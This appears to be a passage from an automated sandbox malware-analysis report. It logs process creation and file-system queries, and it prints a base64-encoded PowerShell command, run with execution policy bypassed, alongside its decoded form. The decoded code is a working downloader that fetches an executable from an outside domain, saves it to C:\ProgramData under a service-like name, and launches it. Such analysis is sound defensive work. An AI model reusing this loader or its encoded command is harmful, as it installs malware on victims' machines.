CAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwA
Encrypted powershell cmdline option foundShow sources
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded function PS-InstallerV2 { param( [Parameter(Mandatory=$true, Position=0)] [string] $link, [Parameter(Mandatory=$true, Position=1)] [string] $endpoint, [Parameter(Mandatory=$true, Position=2)] [string] $file_dir, [Parameter(Mandatory=$true, Position=3)] [string] $file_name, [Parameter(Mandatory=$true, Position=4)] [string]$extension, [Parameter(Mandatory=$true, Position=5)] [bool] $use_access, [Parameter(Position=6)] [string] $access_string ) $internal_memory = New-Object IO.MemoryStream $req_str = $link + "/" + $endpoint if ($use_access) { $req_str = $req_str + "/" + $access_string } $save_path = $file_dir + "\" + $file_name + "." + $extension $request = [System.Net.WebRequest]::Create("$req_str") $response = $request.GetResponse() $response_stream = $response.GetResponseStream() $response_stream.CopyTo($internal_memory) Set-Content $save_path -Value $internal_memory.ToArray() -Encoding Byte $response_stream.Close() $internal_memory.Close() Start-Process -FilePath $save_path}PS-InstallerV2 "https://awmelisers.com" "api/v3/achyranthes/contrapolarization/kulturkreis" "C:\ProgramData" "Awmelisers Service" "exe" $False
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded function PS-InstallerV2 { param( [Parameter(Mandatory=$true, Position=0)] [string] $link, [Parameter(Mandatory=$true, Position=1)] [string] $endpoint, [Parameter(Mandatory=$true, Position=2)] [string] $file_dir, [Parameter(Mandatory=$true, Position=3)] [string] $file_name, [Parameter(Mandatory=$true, Position=4)] [string]$extension, [Parameter(Mandatory=$true, Position=5)] [bool] $use_access, [Parameter(Position=6)] [string] $access_string ) $internal_memory = New-Object IO.MemoryStream $req_str = $link + "/" + $endpoint if ($use_access) { $req_str = $req_str + "/" + $access_string } $save_path = $file_dir + "\" + $file_name + "." + $extension $request = [System.Net.WebRequest]::Create("$req_str") $response = $request.GetResponse() $response_stream = $response.GetResponseStream() $response_stream.CopyTo($internal_memory) Set-Content $save_path -Value $internal_memory.ToArray() -Encoding Byte $response_stream.Close() $internal_memory.Close() Start-Process -FilePath $save_path}PS-InstallerV2 "https://awmelisers.com" "api/v3/achyranthes/contrapolarization/kulturkreis" "C:\ProgramData" "Awmelisers Service" "exe" $FalseJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 'powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQA
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwA
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwAJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwAJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
